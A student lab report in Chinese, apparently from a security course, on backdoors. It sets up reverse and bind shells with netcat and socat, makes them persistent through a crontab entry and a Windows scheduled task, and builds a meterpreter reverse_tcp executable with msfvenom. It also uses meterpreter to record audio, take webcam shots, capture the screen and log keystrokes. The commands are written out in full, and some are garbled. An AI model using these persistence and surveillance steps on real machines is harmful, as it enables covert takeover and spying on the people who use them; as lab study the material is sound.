1. 程式人生 > >20155209 林虹宇Exp2 後門原理與實踐

20155209 林虹宇Exp2 後門原理與實踐

拍照 端口 一個 err 當前 list gets 沒有 com

Exp2 後門原理與實踐

實驗內容

一、使用netcat獲取主機操作Shell,cron啟動

使用netcat獲取主機操作Shell

  • Win獲得Linux Shell
  1. 查看win的ip地址
    技術分享圖片

  2. windows 打開監聽
    技術分享圖片

  3. Linux反彈連接win
  4. windows下獲得一個linux shell,可運行任何指令,如ls
    技術分享圖片

  • Linux獲得Win Shell
  1. 查看kali的ip地址
    技術分享圖片

  2. Linux運行監聽指令
  3. Windows反彈連接Linux
  4. Linux下看到Windows的命令提示
    kali_win.png
    技術分享圖片

  • nc傳輸數據
  1. Windows下監聽端口:
    技術分享圖片

  2. Kali下連接到Windows的端口:
  3. 可以傳輸字符串。
    技術分享圖片

cron啟動

  1. 先在Windows系統下,監聽5209端口:
  2. 在Kali環境下,使用man crontab指令查看crontab命令的幫助文檔,從文檔中我們可以知道crontab指令可以用於設置周期性被執行的指令。該命令從標準輸入設備讀取指令,並將其存放於crontab文件中,以供之後讀取和執行。
    技術分享圖片

  3. 用crontab -e指令編輯一條定時任務
  4. 在最後一行添加10 * * * * /bin/netcat 192.168.33.130 5209 -e /bin/sh。依據我做實驗的時間,我將其設置在每小時的第十分鐘。
    技術分享圖片

  5. 當時間到了,此時已經獲得了Kali的shell,可以輸入指令
    技術分享圖片

二、使用socat獲取主機操作Shell, 任務計劃啟動

  • socat基本語法 socat [options]
  • 其中這2個address就是關鍵了,如果要解釋的話,address就類似於一個文件描述符,socat所做的工作就是在2個address指定的描述符間建立一個pipe用於發送和接收數據。
  1. Windows->控制面板->管理工具->任務計劃程序.執行上述步驟
  2. 新建一個觸發器,選擇當鎖定任何用戶的工作站時
    技術分享圖片

  3. 在操作->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:5209 exec:cmd.exe,pty,stderr
    技術分享圖片

  4. 創建完成之後,按Windows+L快捷鍵鎖定計算機
  5. 此時,在Kali環境下輸入指令socat - tcp:10.1.1.141:5209。即可獲得了一個cmd shell
    技術分享圖片

三、使用MSF meterpreter(或其他軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

  1. 通過模仿命令
    ``msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.136PORT=443 -f exe > meter_backdoor.exe

```
生成自己的後門程序。

  1. 將生成的文件復制到win,我使用之前的nc指令將後門程序傳到win。
    技術分享圖片

  2. 在Kali上使用msfconsole指令進入msf控制臺
    技術分享圖片

  3. 進入handler模式
    技術分享圖片

  4. 設置payload,設置LHOST,設置LPORT
    技術分享圖片

技術分享圖片

  1. 全部設置完成之後,kali下開始監聽,win下啟動後門程序,kali下即獲得win的shell
    技術分享圖片

技術分享圖片

四、使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

  1. 使用record_mic指令可以截獲一段音頻:
    技術分享圖片

  2. 使用webcam_snap指令可以使用攝像頭進行拍照:
    技術分享圖片

技術分享圖片

  1. 使用webcam stream指令可以使用攝像頭進行錄像
    技術分享圖片

  2. 使用screenshot指令可以進行截屏:
    技術分享圖片

  3. 使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄:
    技術分享圖片

  4. 先使用getuid指令查看當前用戶,使用getsystem指令進行提權。但是結果顯示提權失敗,可能是使用的系統有問題。
    技術分享圖片

基礎問題回答

  • 例舉你能想到的一個後門進入到你系統中的可能方式?
  • 平時在網絡上下載東西,其中可能包含後門程序。
  • 例舉你知道的後門如何啟動起來(win及linux)的方式?
  • 通過遠程控制開啟後門程序。
  • 使用定時任務,定時開啟。
  • Meterpreter有哪些給你映像深刻的功能?
  • 我覺得最厲害的是可以提權,獲得System權限,雖然我的提權實驗沒有成功。。。
  • 如何發現自己有的系統有沒有被安裝後門?
  • 通過殺毒軟件進行殺毒

20155209 林虹宇Exp2 後門原理與實踐